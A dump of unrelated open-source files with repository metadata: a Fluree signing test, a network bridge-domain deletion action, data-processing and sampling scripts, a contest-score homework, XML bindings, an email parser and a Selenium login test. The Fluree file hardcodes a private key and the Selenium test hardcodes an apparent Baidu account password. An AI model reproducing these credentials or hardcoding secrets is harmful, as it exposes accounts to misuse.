| 10 | 2020-09-15T14:05:32.000Z | 2022-01-20T11:46:07.000Z | fluree/query-generate.py | ivankoster/aioflureedb | d421391a7db1d2acaf8d39f6dfe2997e8097ade8 | [
"BSD-3-Clause"
]
| 1 | 2020-12-01T10:10:00.000Z | 2020-12-01T10:10:00.000Z | #!/usr/bin/python3
import json
from aioflureedb.signing import DbSigner
def free_test(signer):
data = {"foo": 42, "bar": "appelvlaai"}
body, headers, uri = signer.sign_query(data)
rval = dict()
rval["body"] = body
rval["headers"] = headers
rval["uri"] = uri
rval = json.dumps(rval, indent=4, sort_keys=True)
print(rval)
privkey = "bf8a7281f43918a18a3feab41d17e84f93b064c441106cf248307d87f8a60453"
address = "1AxKSFQ387AiQUX6CuF3JiBPGwYK5XzA1A"
signer = DbSigner(privkey, address, "something/test")
free_test(signer)
| 27.55 | 76 | 0.716878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 178 | 0.323049 |
905d2dacd283245c26f6f827ba4beeef737df514 | 3,447 | py | Python | actions/delete_bridge_domain.py | StackStorm-Exchange/network_essentials | 99cb5a966812fb503d340c6689390dfb08c4e374 | [
"Apache-2.0"
]
| 5 | 2017-02-27T23:48:10.000Z | 2020-11-12T18:55:28.000Z | actions/delete_bridge_domain.py | StackStorm-Exchange/network_essentials | 99cb5a966812fb503d340c6689390dfb08c4e374 | [
"Apache-2.0"
]
| 5 | 2017-03-07T01:19:21.000Z | 2020-09-16T18:22:05.000Z | actions/delete_bridge_domain.py | StackStorm-Exchange/network_essentials | 99cb5a966812fb503d340c6689390dfb08c4e374 | [
"Apache-2.0"
]
| 2 | 2017-06-20T00:52:58.000Z | 2021-01-28T17:45:48.000Z | # Copyright 2016 Brocade Communications Systems, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from ne_base import NosDeviceAction
from ne_base import log_exceptions
import itertools
class DeleteBridgeDomain(NosDeviceAction):
"""
Implements the logic to Delete a BD on SLX devices.
This action achieves the below functionality
1.Delete single/list of bridge domains
"""
def run(self, mgmt_ip, username, password, bridge_domain_id,
bridge_domain_service_type):
"""Run helper methods to implement the desired state.
"""
try:
self.setup_connection(host=mgmt_ip, user=username, passwd=password)
except Exception as e:
self.logger.error(e.message)
sys.exit(-1)
changes = self.switch_operation(bridge_domain_id,
bridge_domain_service_type)
return changes
@log_exceptions
def switch_operation(self, bridge_domain_id, bridge_domain_service_type):
changes = {}
with self.pmgr(conn=self.conn, auth_snmp=self.auth_snmp) as device:
self.logger.info(
'successfully connected to %s to Delete bridge domain',
self.host)
if device.os_type == 'nos' or device.os_type == 'NI':
self.logger.error('Operation is not supported on this device')
raise ValueError('Operation is not supported on this device')
bridge_domain_list = list(itertools.chain.from_iterable(range(int(ranges[0]),
int(ranges[1]) + 1) for ranges in ((el + [el[0]])[:2]
for el in (miniRange.split('-')
for miniRange in bridge_domain_id.split(',')))))
changes['bd_delete'] = self._delete_bridge_domain(device,
bridge_domain_service_type,
bridge_domain_list, bridge_domain_id)
self.logger.info('Closing connection to %s after Deleting '
'bridge domain -- all done!',
self.host)
return changes
def _delete_bridge_domain(self, device, bridge_domain_service_type, bd_list, bd_id):
""" Deleting the bridge-domain """
try:
self.logger.info('Deleting bridge-domain %s', bd_id)
for each_bd in bd_list:
device.interface.bridge_domain(bridge_domain=str(each_bd), delete=True,
bridge_domain_service_type=bridge_domain_service_type)
except (ValueError, KeyError) as e:
self.logger.exception("Deleting bridge-domain failed due to %s"
% (e.message))
raise ValueError("Deleting bridge-domain failed")
return True
| 41.53012 | 100 | 0.607775 | 2,746 | 0.796635 | 0 | 0 | 1,311 | 0.380331 | 0 | 0 | 1,190 | 0.345228 |
905dd4ceac49c186f37f935a9aa23bbcc3c6c3d1 | 1,182 | py | Python | python/signature.py | IUIDSL/kgap_lincs-idg | 1f781e5f34cc5d006a22b8357100dc01845a0690 | [
"CC0-1.0"
]
| 4 | 2021-01-14T14:01:06.000Z | 2021-06-21T12:41:32.000Z | python/signature.py | IUIDSL/kgap_lincs-idg | 1f781e5f34cc5d006a22b8357100dc01845a0690 | [
"CC0-1.0"
]
| null | null | null | python/signature.py | IUIDSL/kgap_lincs-idg | 1f781e5f34cc5d006a22b8357100dc01845a0690 | [
"CC0-1.0"
]
| 1 | 2020-09-01T09:56:58.000Z | 2020-09-01T09:56:58.000Z | #!/usr/bin/env python3
###
# Based on signature.R
###
import sys,os,logging
import numpy as np
import pandas as pd
if __name__=="__main__":
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
if (len(sys.argv) < 3):
logging.error("3 file args required, LINCS sig info for GSE70138 and GSE92742, and output file.")
sys.exit(1)
fn1 = sys.argv[1] #GSE70138_Broad_LINCS_sig_info_2017-03-06.txt.gz
fn2 = sys.argv[2] #GSE92742_Broad_LINCS_sig_info.txt.gz
ofile = sys.argv[3] #signature.tsv
#
part1 = pd.read_table(fn1, "\t", na_values=["-666", "-666.0"])
logging.info(f"columns: {part1.columns}")
part1 = part1[["sig_id", "pert_id", "pert_iname", "pert_type", "cell_id", "pert_idose", "pert_itime"]]
#
part2 = pd.read_table(fn2, "\t", na_values=["-666", "-666.0"], dtype="str")
part2.pert_time = part2.pert_time.astype(np.int32)
logging.info(f"columns: {part2.columns}")
part2 = part2[["sig_id", "pert_id", "pert_iname", "pert_type", "cell_id", "pert_idose", "pert_itime"]]
#
sign = pd.concat([part1, part2])
sign.drop_duplicates(subset=["sig_id"], keep="first", inplace=True)
sign.to_csv(ofile, "\t", index=False)
| 35.818182 | 104 | 0.678511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 531 | 0.449239 |
905ec305866e4908924c5460c3c40007ef7a2438 | 8,289 | py | Python | HW3 - Contest Data Base/main.py | 916-Maria-Popescu/Fundamental-of-Programming | 6ddf951622bd6cfde16ede5ab6ee966cff657db2 | [
"MIT"
]
| null | null | null | HW3 - Contest Data Base/main.py | 916-Maria-Popescu/Fundamental-of-Programming | 6ddf951622bd6cfde16ede5ab6ee966cff657db2 | [
"MIT"
]
| null | null | null | HW3 - Contest Data Base/main.py | 916-Maria-Popescu/Fundamental-of-Programming | 6ddf951622bd6cfde16ede5ab6ee966cff657db2 | [
"MIT"
]
| null | null | null | # ASSIGNMENT 3
"""
During a programming contest, each contestant had to solve 3 problems (named P1, P2 and P3).
Afterwards, an evaluation committee graded the solutions to each of the problems using integers between 0 and 10.
The committee needs a program that will allow managing the list of scores and establishing the winners.
Write a program that implements the functionalities exemplified below:
(A) Add the result of a new participant (add, insert)
(B) Modify scores (remove, remove between two postion, replace the score obtained by a certain participant at a
certain problem with other score obtained by other participant)
(C) Display participants whose score has different properties. """
def get(list, position):
""" The function will extract a certain element from a list."""
return list[int(position)]
def set(list, element, position):
""" The functin will set a certain element from a list.
:param list: [ ['2', '4', '8'], ['3', '5', '6'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'] ]
:param element: ['5', '8', '9']
:param position: 1
:return: [ ['2', '4', '8'], ['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10']
"""
list.insert(int(position), element)
list.remove(get(list, int(position) + 1))
def make_a_list(sentence):
""" The function will make a list containing the given scores P1, P2 and P3 that are found in the command."""
list_one_score = []
for i in range(1, 4):
list_one_score.append(sentence[i])
return list_one_score
def add_scores(list, sentence):
""" The function will add to the principal list (with all the scores of all the participants) a list with the
scores of just one participant.
"""
list.append(make_a_list(sentence))
def insert_scores(list, sentence, position):
""" The function will insert in a given position to the principal list (with all the scores of all the participants)
a list with the scores of just one participant
"""
list.insert(int(position), make_a_list(sentence))
def remove_one_part(list, position):
""" The function will set the scores of the participant at a given position to 0.
So that, the participant <position> score P1=P2=P3= 0. """
nul_element = ['0', '0', '0']
set(list, nul_element, position)
def remove_more_part(list, first_position, last_position):
""" The function will set the scores of all the participants between the first position and last position to 0.
For all the participants between <first_position> and <last_position>, P1=P1=P3= 0 """
nul_element = ['0', '0', '0']
for i in range(int(first_position), int(last_position) + 1):
set(list, nul_element, i)
def remove(list, cmd):
if len(cmd) == 2: # The command is remove <position>
remove_one_part(list, get(cmd, 1))
elif len(cmd) == 4: # The command is remove <first pos> to <last pos>
remove_more_part(list, get(cmd, 1), get(cmd, 3))
def replace(list, problem, new_score):
""" The function will replace a score obtained by a participant at a specific problem with a new score.
List represents the list with the scores of a participant, where <problem> ( P1/P2/P3 ) will recive a new score
"""
set(list, new_score, int(problem[1]) - 1)
def calc_average(list):
""" The function will calculate the average of all the integers from a list ( it will calculate the sum of al the
integers, and then it will divide the sum by the value of the len of tne list)
:param list: [ '2', '4', '3' ]
:return: 3
"""
result = 0
for i in range(0, len(list)):
result = result + int(get(list, i))
return result / len(list)
def average_score_lesser(list, number):
""" The function will display all the participants with an average score lesser than the given number.
:param list: [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']]
:param number: 7
:return:['10', '4', '6'], ['9', '3', '2']
"""
l = [] # l is the required list
for i in range(0, len(list)):
if calc_average(get(list, i)) < number:
l.append(get(list, i))
return l
def average_score_equal(list, number):
""" The function will display all the participants with an average score equal with the given number.
:param list: [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']]
:param number: 8
:return:['7', '8', '9']
"""
l = [] # l is the required list
for i in range(0, len(list)):
if calc_average(get(list, i)) == number:
l.append(get(list, i))
return l
def average_score_greater(list, number):
""" The function will return a list with all the participants with an average score greater than the given number.
:param list: [['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9']]
:param number: 7
:return: [['10', '10', '10'], ['7', '8', '9']]
"""
l = [] # l is the required list
for i in range(0, len(list)):
if calc_average(get(list, i)) > number:
l.append(get(list, i))
return l
def list_sorted(list):
""" The function will return a list with participants sorted in decreasing order of average score
:param list: [['5', '8', '9'], ['10', '4', '6'], ['10', '10', '10'], ['7', '8', '9'], ['10', '2', '9']]
:return: [['10', '10', '10'], , ['7', '8', '9'], ['5', '8', '9'], ['10', '2', '9'], ['10', '4', '6']]
"""
l = []
for i in range(0, len(list)):
get(list, i).insert(0, calc_average(get(list, i)))
l.append(get(list, i))
l.sort(reverse=True)
for i in range(0, len(l)):
get(l, i)
get(l, i).remove(get(get(l, i), 0))
return l
def list(list, cmd):
if len(cmd) == 1:
l = list
elif get(cmd, 1) == 'sorted':
l = list_sorted(list)
elif get(cmd, 1) == '<':
l = average_score_lesser(list, int(get(cmd, 2)))
elif get(cmd, 1) == '=':
l = average_score_equal(list, int(get(cmd, 2)))
elif get(cmd, 1) == '>':
l = average_score_greater(list, int(get(cmd, 2)))
print(l)
def print_menu():
commands = ['add <P1 score> <P2 score> <P3 score>', 'insert <P1 score> <P2 score> <P3 score> at <position>',
'remove <position>', 'remove <start position> to <end position>',
'replace <position> <P1 | P2 | P3> with <new score>', 'list', 'list sorted', 'list [< | = | >] <score>']
print("The possible comands are:")
print(*commands, sep="\n")
def run_menu():
list_participants_scores = [['5', '8', '9'], ['10', '4', '6'], ['9', '3', '2'], ['10', '10', '10'], ['7', '8', '9'],
['8', '9', '10'], ['10', '2', '9'], ['2', '4', '6'], ['8', '2', '1'], ['0', '8', '4']]
commands = ['add <P1 score> <P2 score> <P3 score>', 'insert <P1 score> <P2 score> <P3 score> at <position>',
'remove <position>', 'remove <start position> to <end position>',
'replace <position> <P1 | P2 | P3> with <new score>', 'list', 'list sorted', 'list [< | = | >] <score>']
while True:
comand = input()
comand_splited = comand.split()
first_word = get(comand_splited, 0)
if first_word == 'add': # The command is add P1, P2, P3
add_scores(list_participants_scores, comand_splited)
elif first_word == 'insert': # The command is insert [P1, P2, P3] at position
insert_scores(list_participants_scores, comand_splited, comand_splited[5])
elif first_word == 'remove':
remove(list_participants_scores, comand_splited)
elif first_word == 'replace': # The command is replace <old score> P1/P2/P3 with <new score>
replace(get(list_participants_scores, int(get(comand_splited, 1))), get(comand_splited, 2),
(get(comand_splited, 4)))
elif first_word == 'list':
(list(list_participants_scores, comand_splited))
else:
print("Wrong command")
break
if __name__ == '__main__':
print_menu()
run_menu()
| 37.849315 | 120 | 0.583183 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,626 | 0.558089 |
905fb1174dc9f76a043ce3432db2989539fb3eae | 1,212 | py | Python | surface/ex_surface02.py | orbingol/NURBS-Python_Examples | c99d8cd3d20e7523694ce62f72760b260582fa11 | [
"MIT"
]
| 48 | 2017-12-14T09:54:48.000Z | 2020-03-30T13:34:44.000Z | surface/ex_surface02.py | GabrielJie/NURBS-Python_Examples | c99d8cd3d20e7523694ce62f72760b260582fa11 | [
"MIT"
]
| 7 | 2020-05-27T04:27:24.000Z | 2021-05-25T16:11:39.000Z | surface/ex_surface02.py | GabrielJie/NURBS-Python_Examples | c99d8cd3d20e7523694ce62f72760b260582fa11 | [
"MIT"
]
| 37 | 2017-10-14T08:11:11.000Z | 2020-05-04T02:51:58.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Examples for the NURBS-Python Package
Released under MIT License
Developed by Onur Rauf Bingol (c) 2016-2017
"""
import os
from geomdl import BSpline
from geomdl import utilities
from geomdl import exchange
from geomdl import operations
from geomdl.visualization import VisPlotly
# Fix file path
os.chdir(os.path.dirname(os.path.realpath(__file__)))
# Create a BSpline surface instance
surf = BSpline.Surface()
# Set degrees
surf.degree_u = 3
surf.degree_v = 3
# Set control points
surf.set_ctrlpts(*exchange.import_txt("ex_surface02.cpt", two_dimensional=True))
# Set knot vectors
surf.knotvector_u = utilities.generate_knot_vector(surf.degree_u, 6)
surf.knotvector_v = utilities.generate_knot_vector(surf.degree_v, 6)
# Set evaluation delta
surf.delta = 0.025
# Evaluate surface
surf.evaluate()
# Plot the control point grid and the evaluated surface
vis_comp = VisPlotly.VisSurface()
surf.vis = vis_comp
surf.render()
# Evaluate surface tangent and normal at the given u and v
uv = [0.2, 0.9]
surf_tangent = operations.tangent(surf, uv)
surf_normal = operations.normal(surf, uv)
# Good to have something here to put a breakpoint
pass
| 22.867925 | 80 | 0.763201 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 493 | 0.406766 |
90600f2b374617aa571df4d29f498ce0b363ef8b | 1,380 | bzl | Python | dev/bazel/deps/micromkl.bzl | cmsxbc/oneDAL | eeb8523285907dc359c84ca4894579d5d1d9f57e | [
"Apache-2.0"
]
| 169 | 2020-03-30T09:13:05.000Z | 2022-03-15T11:12:36.000Z | dev/bazel/deps/micromkl.bzl | cmsxbc/oneDAL | eeb8523285907dc359c84ca4894579d5d1d9f57e | [
"Apache-2.0"
]
| 1,198 | 2020-03-24T17:26:18.000Z | 2022-03-31T08:06:15.000Z | dev/bazel/deps/micromkl.bzl | cmsxbc/oneDAL | eeb8523285907dc359c84ca4894579d5d1d9f57e | [
"Apache-2.0"
]
| 75 | 2020-03-30T11:39:58.000Z | 2022-03-26T05:16:20.000Z | #===============================================================================
# Copyright 2020-2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
load("@onedal//dev/bazel:repos.bzl", "repos")
micromkl_repo = repos.prebuilt_libs_repo_rule(
includes = [
"include",
"%{os}/include",
],
libs = [
"%{os}/lib/intel64/libdaal_mkl_thread.a",
"%{os}/lib/intel64/libdaal_mkl_sequential.a",
"%{os}/lib/intel64/libdaal_vmlipp_core.a",
],
build_template = "@onedal//dev/bazel/deps:micromkl.tpl.BUILD",
)
micromkl_dpc_repo = repos.prebuilt_libs_repo_rule(
includes = [
"include",
],
libs = [
"lib/intel64/libdaal_sycl.a",
],
build_template = "@onedal//dev/bazel/deps:micromkldpc.tpl.BUILD",
)
| 33.658537 | 80 | 0.603623 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,047 | 0.758696 |
9061aefc06f55a6c43c18d036ea605173b84260a | 3,580 | py | Python | opennsa/protocols/nsi2/bindings/p2pservices.py | jmacauley/opennsa | 853c0fc8e065e74815cbc3f769939f64ac6aadeb | [
"BSD-3-Clause"
]
| null | null | null | opennsa/protocols/nsi2/bindings/p2pservices.py | jmacauley/opennsa | 853c0fc8e065e74815cbc3f769939f64ac6aadeb | [
"BSD-3-Clause"
]
| null | null | null | opennsa/protocols/nsi2/bindings/p2pservices.py | jmacauley/opennsa | 853c0fc8e065e74815cbc3f769939f64ac6aadeb | [
"BSD-3-Clause"
]
| null | null | null | ## Generated by pyxsdgen
from xml.etree import ElementTree as ET
# types
class OrderedStpType(object):
def __init__(self, order, stp):
self.order = order # int
self.stp = stp # StpIdType -> string
@classmethod
def build(self, element):
return OrderedStpType(
element.get('order'),
element.findtext('stp')
)
def xml(self, elementName):
r = ET.Element(elementName, attrib={'order' : str(self.order)})
ET.SubElement(r, 'stp').text = self.stp
return r
class TypeValueType(object):
def __init__(self, type_, value):
self.type_ = type_
self.value = value
@classmethod
def build(self, element):
return TypeValueType(
element.get('type'),
element.text
)
def xml(self, elementName):
r = ET.Element(elementName, attrib={'type' : self.type_})
r.text = self.value
return r
class P2PServiceBaseType(object):
def __init__(self, capacity, directionality, symmetricPath, sourceSTP, destSTP, ero, parameter):
self.capacity = capacity # long
self.directionality = directionality # DirectionalityType -> string
self.symmetricPath = symmetricPath # boolean
self.sourceSTP = sourceSTP # StpIdType -> string
self.destSTP = destSTP # StpIdType -> string
self.ero = ero # [ OrderedStpType ]
self.parameter = parameter # [ TypeValueType ]
@classmethod
def build(self, element):
return P2PServiceBaseType(
int(element.findtext('capacity')),
element.findtext('directionality'),
True if element.findtext('symmetricPath') == 'true' else False if element.find('symmetricPath') is not None else None,
element.findtext('sourceSTP'),
element.findtext('destSTP'),
[ OrderedStpType.build(e) for e in element.find('ero') ] if element.find('ero') is not None else None,
[ TypeValueType.build(e) for e in element.findall('parameter') ] if element.find('parameter') is not None else None
)
def xml(self, elementName):
r = ET.Element(elementName)
ET.SubElement(r, 'capacity').text = str(self.capacity)
ET.SubElement(r, 'directionality').text = self.directionality
if self.symmetricPath is not None:
ET.SubElement(r, 'symmetricPath').text = 'true' if self.symmetricPath else 'false'
ET.SubElement(r, 'sourceSTP').text = self.sourceSTP
ET.SubElement(r, 'destSTP').text = self.destSTP
if self.ero is not None:
ET.SubElement(r, 'ero').extend( [ e.xml('orderedSTP') for e in self.ero ] )
if self.parameter is not None:
for p in self.parameter:
ET.SubElement(r, 'parameter', attrib={'type': p.type_}).text = p.value
return r
POINT2POINT_NS = 'http://schemas.ogf.org/nsi/2013/12/services/point2point'
p2ps = ET.QName(POINT2POINT_NS, 'p2ps')
capacity = ET.QName(POINT2POINT_NS, 'capacity')
parameter = ET.QName(POINT2POINT_NS, 'parameter')
def parse(input_):
root = ET.fromstring(input_)
return parseElement(root)
def parseElement(element):
type_map = {
str(p2ps) : P2PServiceBaseType,
str(parameter) : TypeValueType
}
if not element.tag in type_map:
raise ValueError('No type mapping for tag %s' % element.tag)
type_ = type_map[element.tag]
return type_.build(element)
| 33.773585 | 134 | 0.613966 | 2,872 | 0.802235 | 0 | 0 | 998 | 0.278771 | 0 | 0 | 553 | 0.154469 |
90633c1edf956b4cbfebb1310e68eb561ac6fc3b | 87 | py | Python | Scripts/PyLecTest.py | DVecchione/DVEC | 8788310acefe948c1c40b2ecfd781b0af7027993 | [
"MIT"
]
| null | null | null | Scripts/PyLecTest.py | DVecchione/DVEC | 8788310acefe948c1c40b2ecfd781b0af7027993 | [
"MIT"
]
| null | null | null | Scripts/PyLecTest.py | DVecchione/DVEC | 8788310acefe948c1c40b2ecfd781b0af7027993 | [
"MIT"
]
| null | null | null | import matplotlib.pyplot as plt
import numpy as np
x=20
y=1
plt.plot(x,y)
plt.show()
| 9.666667 | 31 | 0.724138 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
90667496af942d519fbd83a19bb664048a86c4ea | 3,708 | py | Python | examples/nested/mog4_fast.py | ivandebono/nnest | 490b0797312c22a1019f5f400db684b1be5e8fe5 | [
"MIT"
]
| null | null | null | examples/nested/mog4_fast.py | ivandebono/nnest | 490b0797312c22a1019f5f400db684b1be5e8fe5 | [
"MIT"
]
| null | null | null | examples/nested/mog4_fast.py | ivandebono/nnest | 490b0797312c22a1019f5f400db684b1be5e8fe5 | [
"MIT"
]
| null | null | null | import os
import sys
import argparse
import copy
import numpy as np
import scipy.special
sys.path.append(os.getcwd())
def log_gaussian_pdf(theta, sigma=1, mu=0, ndim=None):
if ndim is None:
try:
ndim = len(theta)
except TypeError:
assert isinstance(theta, (float, int)), theta
ndim = 1
logl = -(np.sum((theta - mu) ** 2) / (2 * sigma ** 2))
logl -= np.log(2 * np.pi * (sigma ** 2)) * ndim / 2.0
return logl
class Gaussian(object):
def __init__(self, sigma=1.0, nderived=0):
self.sigma = sigma
self.nderived = nderived
def __call__(self, theta):
logl = log_gaussian_pdf(theta, sigma=self.sigma, mu=0)
return logl, [0.0] * self.nderived
class GaussianMix(object):
def __init__(self, sep=4, weights=(0.4, 0.3, 0.2, 0.1), sigma=1,
nderived=0):
assert len(weights) in [2, 3, 4], (
'Weights must have 2, 3 or 4 components. Weights=' + str(weights))
assert np.isclose(sum(weights), 1), (
'Weights must sum to 1! Weights=' + str(weights))
self.nderived = nderived
self.weights = weights
self.sigmas = [sigma] * len(weights)
positions = []
positions.append(np.asarray([0, sep]))
positions.append(np.asarray([0, -sep]))
positions.append(np.asarray([sep, 0]))
positions.append(np.asarray([-sep, 0]))
self.positions = positions[:len(weights)]
def __call__(self, theta):
thetas = []
for pos in self.positions:
thetas.append(copy.deepcopy(theta))
thetas[-1][:2] -= pos
logls = [(Gaussian(sigma=self.sigmas[i])(thetas[i])[0]
+ np.log(self.weights[i])) for i in range(len(self.weights))]
logl = scipy.special.logsumexp(logls)
return logl, [0.0] * self.nderived
def main(args):
from nnest import NestedSampler
g = GaussianMix()
def loglike(z):
return np.array([g(x)[0] for x in z])
def transform(x):
return 10. * x
volume_switch = 1.0 / (5 * args.num_slow)
sampler = NestedSampler(args.x_dim, loglike, transform=transform, log_dir=args.log_dir, num_live_points=args.num_live_points,
hidden_dim=args.hidden_dim, num_layers=args.num_layers, num_blocks=args.num_blocks, num_slow=args.num_slow,
use_gpu=args.use_gpu)
sampler.run(train_iters=args.train_iters, mcmc_steps=args.mcmc_steps, volume_switch=volume_switch, noise=args.noise)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--x_dim', type=int, default=5,
help="Dimensionality")
parser.add_argument('--train_iters', type=int, default=2000,
help="number of train iters")
parser.add_argument("--mcmc_steps", type=int, default=0)
parser.add_argument("--num_live_points", type=int, default=1000)
parser.add_argument('--switch', type=float, default=-1)
parser.add_argument('--hidden_dim', type=int, default=128)
parser.add_argument('--num_layers', type=int, default=2)
parser.add_argument('--batch_size', type=int, default=100)
parser.add_argument('-use_gpu', action='store_true')
parser.add_argument('--flow', type=str, default='nvp')
parser.add_argument('--num_blocks', type=int, default=5)
parser.add_argument('--noise', type=float, default=-1)
parser.add_argument('--run_num', type=str, default='')
parser.add_argument('--num_slow', type=int, default=2)
parser.add_argument('--log_dir', type=str, default='logs/mog4_fast')
args = parser.parse_args()
main(args)
| 34.654206 | 135 | 0.618932 | 1,399 | 0.377292 | 0 | 0 | 0 | 0 | 0 | 0 | 351 | 0.09466 |
9066a9157ffc22c0ce94777109f0d24999e2d0dd | 3,060 | py | Python | sendria/message.py | scottcove/sendria | 26e7581cc8d7673887ac8018d8d32ff4ad23cfbd | [
"MIT"
]
| 85 | 2020-10-03T22:11:55.000Z | 2022-03-25T12:49:44.000Z | sendria/message.py | scottcove/sendria | 26e7581cc8d7673887ac8018d8d32ff4ad23cfbd | [
"MIT"
]
| 13 | 2020-10-05T10:59:34.000Z | 2022-03-26T08:16:24.000Z | sendria/message.py | scottcove/sendria | 26e7581cc8d7673887ac8018d8d32ff4ad23cfbd | [
"MIT"
]
| 13 | 2020-10-15T13:32:40.000Z | 2022-03-28T01:46:58.000Z | __all__ = ['Message']
import uuid
from email.header import decode_header as _decode_header
from email.message import Message as EmailMessage
from email.utils import getaddresses
from typing import Union, List, Dict, Any
class Message:
__slots__ = (
'id',
'sender_envelope', 'sender_message',
'recipients_envelope', 'recipients_message_to',
'recipients_message_cc', 'recipients_message_bcc',
'subject',
'source',
'size', 'type', 'peer',
'parts',
'created_at',
)
@classmethod
def from_email(cls, email: EmailMessage) -> 'Message':
o = cls()
o.id = None
o.sender_envelope = cls.decode_header(email['X-MailFrom'])
o.sender_message = cls.decode_header(email['FROM'])
o.recipients_envelope = email['X-RcptTo']
o.recipients_message_to = cls.split_addresses(cls.decode_header(email['TO'])) if 'TO' in email else []
o.recipients_message_cc = cls.split_addresses(cls.decode_header(email['CC'])) if 'CC' in email else []
o.recipients_message_bcc = cls.split_addresses(cls.decode_header(email['BCC'])) if 'BCC' in email else []
o.subject = cls.decode_header(email['Subject'])
o.source = email.as_string()
o.size = len(o.source)
o.type = email.get_content_type()
o.peer = ':'.join([i.strip(" '()")for i in email['X-Peer'].split(',')])
o.parts = []
o.created_at = None
for part in cls.iter_message_parts(email):
cid = part.get('Content-Id') or str(uuid.uuid4())
if cid[0] == '<' and cid[-1] == '>':
cid = cid[1:-1]
o.parts.append({'cid': cid, 'part': part})
return o
def to_dict(self) -> Dict[str, Any]:
return {
k: getattr(self, k)
for k in self.__slots__
}
def __repr__(self) -> str:
r = []
for k in self.__slots__:
if k not in ('source', 'parts'):
r.append(f'{k}={getattr(self, k)}')
else:
r.append(f'{k}=...')
return f'<EmailMessage: {", ".join(r)}>'
@classmethod
def decode_header(cls, value: Union[str, bytes, None]) -> str:
if not value:
return ''
headers = []
for decoded, charset in _decode_header(value):
if isinstance(decoded, str):
headers.append(decoded.encode(charset or 'utf-8'))
else:
headers.append(decoded)
return (b''.join(headers)).decode()
@classmethod
def split_addresses(cls, value: str) -> List[str]:
return [('{0} <{1}>'.format(name, addr) if name else addr)
for name, addr in getaddresses([value])]
@classmethod
def iter_message_parts(cls, email: EmailMessage) -> EmailMessage:
if email.is_multipart():
for payload in email.get_payload():
for part in cls.iter_message_parts(payload):
yield part
else:
yield email
| 34.382022 | 113 | 0.56732 | 2,836 | 0.926797 | 276 | 0.090196 | 2,074 | 0.677778 | 0 | 0 | 418 | 0.136601 |
9066b9980c0b3869cc716e1c22a3fe141c968868 | 1,705 | py | Python | myApps/test_web.py | Rocket-hodgepodge/NewsWeb | 7835b6ae4e754eb96f3f0d5983b2421c9464fee3 | [
"BSD-3-Clause"
]
| null | null | null | myApps/test_web.py | Rocket-hodgepodge/NewsWeb | 7835b6ae4e754eb96f3f0d5983b2421c9464fee3 | [
"BSD-3-Clause"
]
| null | null | null | myApps/test_web.py | Rocket-hodgepodge/NewsWeb | 7835b6ae4e754eb96f3f0d5983b2421c9464fee3 | [
"BSD-3-Clause"
]
| 2 | 2018-07-04T01:43:36.000Z | 2018-07-04T06:12:47.000Z | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import unittest
class NewVisitorTest(unittest.TestCase):
def setUp(self):
self.timeout = 40
self.browser = webdriver.Chrome()
self.browser.set_page_load_timeout(self.timeout)
self.wait = WebDriverWait(self.browser, self.timeout)
def tearDown(self):
self.browser.quit()
def test_can_start_a_list_and_retrieve_it_later(self):
self.browser.get('https://www.baidu.com')
self.assertIn('百度', self.browser.title)
login_link = self.wait.until(
EC.element_to_be_clickable((By.LINK_TEXT, '登录')))
login_link.click()
login_link_2 = self.wait.until(
EC.element_to_be_clickable((By.ID, 'TANGRAM__PSP_10__footerULoginBtn')))
login_link_2.click()
username_input = self.wait.until(
EC.presence_of_element_located((By.ID, 'TANGRAM__PSP_10__userName')))
username_input.clear()
username_input.send_keys('橙色烟月')
password_input = self.wait.until(
EC.presence_of_element_located((By.ID, 'TANGRAM__PSP_10__password')))
password_input.clear()
password_input.send_keys('1659636840sec')
login_submit_button = self.wait.until(
EC.element_to_be_clickable((By.ID, 'TANGRAM__PSP_10__submit')))
login_submit_button.click()
username_span = self.wait.until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#s_username_top > span')))
self.assertEqual(username_span.text, 'PebbleApp')
# user_login_link = self.browser.find_element_by_id('TANGRAM__PSP_10__footerULoginBtn')
# user_login_link.click()
if __name__ == '__main__':
unittest.main(warnings='ignore')
| 31.574074 | 89 | 0.775367 | 1,444 | 0.839047 | 0 | 0 | 0 | 0 | 0 | 0 | 346 | 0.201046 |
9067bc1c116c9890747e5871781d17c6c8744561 | 30,017 | py | Python | nce_glue/run_glue.py | salesforce/ebm_calibration_nlu | e0598923551c4587e0ea8c4feb001cb9cc736103 | [
"BSD-3-Clause"
]
| 7 | 2021-04-22T09:56:54.000Z | 2022-03-20T14:44:02.000Z | nce_glue/run_glue.py | salesforce/ebm_calibration_nlu | e0598923551c4587e0ea8c4feb001cb9cc736103 | [
"BSD-3-Clause"
]
